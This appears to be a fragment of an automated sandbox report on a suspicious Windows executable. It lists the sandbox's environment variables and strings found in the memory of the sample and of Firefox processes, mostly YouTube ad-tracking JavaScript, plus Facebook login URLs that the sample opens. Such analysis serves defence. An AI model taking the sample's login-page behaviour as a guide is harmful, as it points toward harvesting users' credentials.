GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windowsg:h equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: function pob(){var a,b,c,d,e,h,l,m,p,q,u;return t(function(x){switch(x.nextAddress){case 1:ka(x,2),a=k(Eob()),b=a.next();case 4:if(b.done)return x.return(1);d=c=b.value;e=d.jsonRepresentation;h=d.objectRepresentation;l=btoa(e);m="data:application/json;base64,"+l;p=new Request(m);Object.defineProperty(p,"url",{get:function(){return"https://www.youtube.com/youtubei/v1/player?key=AIzaSyAO_FJ2SlqU8Q4STEHLGCilw_Y9_11qcW8&prettyPrint=false"}}); equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: hoverText:{runs:[{text:jd}]},trackingParams:hb+"="}},adVideoId:Fc,impressionPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=video_companion_impression_tracking"}],adLayoutLoggingData:{serializedAdServingDataEntry:qa},associatedCompositePlayerBytesLayoutId:Ic}},adSlotLoggingData:{serializedSlotAdServingDataEntry:ld}}},{adPlacementRenderer:{config:{adPlacementConfig:{kind:"AD_PLACEMENT_KIND_SELF_START"}},renderer:{actionCompanionAdRenderer:{headline:{text:ld, equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/login equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/login#, equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/loginA equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/loginGI equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/logind equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.facebook.com/loginy equals www.facebook.com (Facebook)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.0000000001918000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: https://www.youtube.com/+ equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/.j equals www.youtube.com (Youtube)
Source: 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000002.2473037584.000000000193F000.00000004.00000020.00020000.00000000.sdmp, 3kaNpKWTvXjwLZn_llOJ.exe, 00000010.00000003.2362295339.000000000193F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/~k>{ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ic+";dc_dbm_token="+x+";dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;ltd=;dc_tdv="+ja+";ord="+ic+";dc_rui="+ja+";dc_exteid="+kb+";dc_av="+ja+";dc_sk="+ja+";dc_ctype="+eb+";dc_pubid="+ja+";dc_btype=3?gclid="+Na+"&ase=2"},{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_card_endcap_action_headline_click"}],commandMetadata:{webCommandMetadata:{url:"https://www.googleadservices.com/pagead/aclk?sa=L&ai=C"+B+"____________"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ic+";dc_trk_cid="+ic+";dc_dbm_token="+x+";dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;ltd=;dc_tdv="+ja+";ord="+ic+";dc_rui="+ja+";dc_exteid="+kc+";dc_av="+ja+";dc_sk="+ja+";dc_ctype="+eb+";dc_pubid="+ja+";dc_btype=3?gclid="+Na+"&ase=2",attributionSrcMode:"ATTRIBUTION_SRC_MODE_LABEL_CHROME"}],fullscreenPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adfullscreen&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: if(b){var c=Vib.get(b);c\|\|(c=[],Vib.set(b,c));var d=ul("ELEMENT_POOL_CONFIG")\|\|{};c.length>=(void 0!==d[b]?d[b]:ul("ELEMENT_POOL_DEFAULT_CAP",0))\|\|c.push(a)}else Cq(new nm("Element pool should only handle custom elements:",a.nodeName))},Vib=new Map,Xib=0,Wib=0;var fE=new Map([["FACE_HAPPY",{name:"animated_face_happy_light",nameDarkTheme:"animated_face_happy_dark",path:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_happy.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_happy.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"FACE_HAPPY",totalFrames:121,lazyLoad:!1}],["FACE_MEH",{name:"animated_face_meh_light",nameDarkTheme:"animated_face_meh_dark", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: isTemplated:!0,trackingParams:hb+"="}},trackingParams:hb+"="}},adInfoRenderer:{adHoverTextButtonRenderer:{button:{buttonRenderer:{style:"STYLE_UNKNOWN",size:"SIZE_DEFAULT",isDisabled:!1,serviceEndpoint:{clickTrackingParams:Bc,openPopupAction:{popup:{aboutThisAdRenderer:{url:(Jf.privateDoNotAccessOrElseTrustedResourceUrlWrappedValue="https://www.youtube.com/aboutthisad?pf=web&source=youtube&reasons=A"+T+"&hl="+Ga+"&origin=www.youtube.com&ata_theme="+He,Jf),trackingParams:hb+"="}},popupType:"DIALOG"}}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],thirdQuartilePings:[{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ac+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],completePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=videoplaytime100&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],unmutePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=adunmute&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ac+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}], equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],unmutePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=adunmute&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+ac+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],pausePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBF3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],pingingEndpoint:{hack:!0}}]},adRendererCommands:{impressionCommand:{clickTrackingParams:Bc,commandExecutorCommand:{commands:[{clickTrackingParams:Bc,loggingUrls:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_card_endcap_impression"}],pingingEndpoint:{hack:!0}}]}}},skipButton:{skipButtonRenderer:{message:{text:Fc,isTemplated:!1,trackingParams:hb+ equals www.youtube.com (Youtube)
Source: favicons.sqlite-wal.51.dr	String found in binary or memory: jhttps://www.youtube.com/s/desktop/80338919/img/favicon.ico equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992190171.0000026F5DDE3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kC&&kC.JSC$7834_snapshotAndFlush()}},b),(c.flush_logs={callback:function(){yq()}},c))}},vyb);var xyb={},yyb=(xyb.rendered={priority:0,callback:function(){var a=new fJa;a.increment("STARTED");if(ul("LOGGED_IN")&&"test"!==ul("SERVER_VERSION")&&"dev"!==ul("SERVER_VERSION")&&!xia()&&!wia()){a.increment("EXECUTING");var b=document.createElement("iframe");b.style.display="none";$ia(b,3,sh("https://accounts.youtube.com/RotateCookiesPage?origin=https://www.youtube.com&yt_pid="+ul("INNERTUBE_CONTEXT_CLIENT_NAME")));document.body&&document.body.appendChild(b);a.increment("DONE")}}},xyb);var zyb={},Ayb=(zyb.rendered={callback:function(){vub().resume()}},zyb);var Byb={acknowledgeChannelTouStrikeCommand:GC(hI),addToPlaylistServiceEndpoint:GC(ZI),addUpcomingEventReminderEndpoint:GC(wI),browseEndpoint:GC($tb),channelCreationFormEndpoint:GC(aI),channelCreationServiceEndpoint:GC(bI),claimLegacyYoutubeChannelEndpoint:GC(PH),clearSearchHistoryEndpoint:GC(oI),clearWatchHistoryEndpoint:GC(pI),commerceActionCommand:HC(tJ),createBackstagePostEndpoint:GC(JH),createCommentEndpoint:GC(XH),createCommentReplyEndpoint:GC(WH),createLiveChatPollEndpoint:GC(xI),createPlaylistServiceEndpoint:GC($I), equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: kb+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]?"}],abandonPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+y+"&cid="+oa+"&label=video_abandon&ad_mt=[AD_MT]&ad_tos=[AD_TOS]&ad_wat=[AD_WAT]&final=[FINAL]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],activeViewFullyViewableAudibleHalfDurationPings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lazyLoad:!1}],["FACE_VERY_HAPPY",{name:"animated_face_very_happy_light",nameDarkTheme:"animated_face_very_happy_dark",path:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_very_happy.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_very_happy.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"FACE_VERY_HAPPY",totalFrames:121,lazyLoad:!1}],["LIKE",{name:"animated_like_light",nameDarkTheme:"animated_like_dark", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"FACE_SAD",totalFrames:121,lazyLoad:!1}],["FACE_UNHAPPY",{name:"animated_face_unhappy_light",nameDarkTheme:"animated_face_unhappy_dark",path:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_unhappy.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_unhappy.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"FACE_UNHAPPY",totalFrames:121, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: m+"&len="+Kb+"&ns="+Ga+"&plid="+R+"&ver="+ja,elapsedMediaTimeSeconds:5},videostatsScheduledFlushWalltimeSeconds:[10,20,30],videostatsDefaultFlushIntervalSeconds:40},captions:{playerCaptionsTracklistRenderer:{captionTracks:[{baseUrl:"https://www.youtube.com/api/timedtext?v="+y+"&caps="+Zb+"&opi="+ic+"&xoaf="+ja+"&hl="+Ga+"&ip="+Ya+"&ipbits="+ja+"&expire="+xb+"&sparams=ip,ipbits,expire,v,caps,opi,xoaf&signature="+Ya+"&key="+Zb+"&lang="+Aa,name:{simpleText:Ic},vssId:".en-US",languageCode:"en-US",isTranslatable:!0, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2983155830.0000026F5D83D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: moz-extension://6edd4cbe-8a9f-4158-beca-90f5feba9c8c/injections/js/bug1842437-www.youtube.com-performance-now-precision.js equals www.youtube.com (Youtube)
Source: firefox.exe, 00000030.00000002.2593916370.000001838BEC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: nn"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/login --attempting-deelevation equals www.facebook.com (Facebook)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: oa+"&label=adrewind&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}],resumePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=adresume&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],skipPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: offsetMilliseconds:15E3}],fullscreenPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=adfullscreen&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],activeViewViewablePings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993057754.0000026F5DBA3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: p.ptrackingUrl)?void 0:H.baseUrl);var R;q.push(null==p?void 0:null==(R=p.qoeUrl)?void 0:R.baseUrl);var T;q.push(null==p?void 0:null==(T=p.atrUrl)?void 0:T.baseUrl);y=k(q);for(B=y.next();!B.done;B=y.next())if((B=B.value)&&m.test(B)){y=B.replace("https://www.youtube.com","").replace("https://s.youtube.com","");break b}}y=void 0}y&&c.push({testUrl:""+ya.location.origin+y,baseUrl:ya.location.origin+"/feed/download",method:"GET"})}c=0!==c.length?c[Math.floor(Math.random()*c.length)]:void 0;return(a=c)? equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: path:"https://www.gstatic.com/youtube/img/lottie/animated_like_icon/animated_like_icon_v2_light.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/lottie/animated_like_icon/animated_like_icon_v2_dark.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"LIKE",totalFrames:119,lazyLoad:I("web_animated_like_lazy_load")}],["NOTIFICATION_BELL",{name:"notification_bell_light",nameDarkTheme:"notification_bell_dark",path:"https://www.gstatic.com/youtube/img/lottie/subscribe_action/subscribe_action_bell_icon_light.json", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: path:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_meh.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_meh.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"FACE_MEH",totalFrames:121,lazyLoad:!1}],["FACE_SAD",{name:"animated_face_sad_light",nameDarkTheme:"animated_face_sad_dark",path:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/light_mode/face_sad.json",pathDarkTheme:"https://www.gstatic.com/youtube/img/surveys/lottie/animated_smileys/dark_mode/face_sad.json", equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2992813819.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993652957.0000026F5DC33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pathDarkTheme:"https://www.gstatic.com/youtube/img/lottie/subscribe_action/subscribe_action_bell_icon_dark.json",lottiePlayerProps:{animationConfig:{loop:!1,autoplay:!1}},type:"NOTIFICATION_BELL",totalFrames:79,lazyLoad:!1}]]);var Zib=ca(["https://www.gstatic.com/external_hosted/lottie/lottie_light.js"]),$ib=Rh(Zib),gE;function ajb(){return gE?gE:window.lottie?gE=Promise.resolve(window.lottie):gE=new Promise(function(a,b){var c=document.createElement("script");c.addEventListener("load",function(){a(lottie)}); equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pausePings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=adpause&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ja+"="+ja+";etm1="+ja+";eid1="+eb+";acvw=[VIEWABILITY];gv=[GOOGLE_VIEWABILITY]?"}],rewindPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pingingEndpoint:{hack:!0}}]}}},skipButton:{skipButtonRenderer:{message:{text:Ac,isTemplated:!1,trackingParams:hb+"="},trackingParams:hb+"="}},adLayoutLoggingData:{serializedAdServingDataEntry:Ic},skipPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=videoskipped&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://ade.googlesyndication.com/ddm/activity_ext/dc_pubid="+ja+";dc_exteid="+kb+";met="+ja+";ecn"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: pings:{impressionPings:[{baseUrl:"https://ad.doubleclick.net/ddm/trackimp/N444803.2428500DBMSITEID/B30029229.368252041;dc_trk_aid="+ic+";dc_trk_cid="+ic+";dc_dbm_token="+x+";ord="+xb+";dc_lat=;dc_rdid=;tag_for_child_directed_treatment=;tfua=;ltd=;dc_tdv="+ja+";dc_rui="+ja+";dc_exteid="+kb+";dc_av="+Db+";dc_sk="+ja+";dc_ctype="+eb+";dc_ref=http://www.youtube.com/video/"+Fc+";dc_pubid="+ja+";dc_btype=23?gclid="+Na+"&ase=2",attributionSrcMode:"ATTRIBUTION_SRC_MODE_LABEL_CHROME"},{baseUrl:"https://www.youtube.com/pagead/adview?ai=C"+ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2994692431.0000026F5DBFB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2993152051.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000033.00000003.2995754527.0000026F5DB33000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: progressPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=video_skip_shown&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]",offsetMilliseconds:5E3},{baseUrl:"https://www.googleadservices.com/pagead/aclk?sa=L&ai=C"+B+"____________"+D+"AxAA&ase=2&num="+ja+"&cid="+oa+"&ad_cpn=%5BAD_CPN%5D&sig="+fa+"&adurl="+Oc+"&ctype="+Db+"&ms=[CLICK_MS]&label=video_10s_engaged_view&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=",offsetMilliseconds:1E4, equals www.youtube.com (Youtube)
Source: firefox.exe, 00000033.00000003.2993102927.0000026F5DB8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: q+"&sig="+bc+"&ad_cpn=[AD_CPN]&id="+Ac+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"},{baseUrl:"https://pagead2.googlesyndication.com/activeview_ext?id="+Ac+"&dc_pubid="+ja+"&dc_exteid="+kb+"&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]?"}],endFullscreenPings:[{baseUrl:"https://www.youtube.com/pagead/interaction/?ai=C"+B+"____________"+D+"AxAA&sigh="+Fc+"&cid="+oa+"&label=vast_exit_fullscreen&ad_mt=[AD_MT]&acvw=[VIEWABILITY]&gv=[GOOGLE_VIEWABILITY]"}],activeViewMeasurablePings:[{baseUrl:"https://www.youtube.com/pcs/activeview?xai="+ equals www.youtube.com (Youtube)
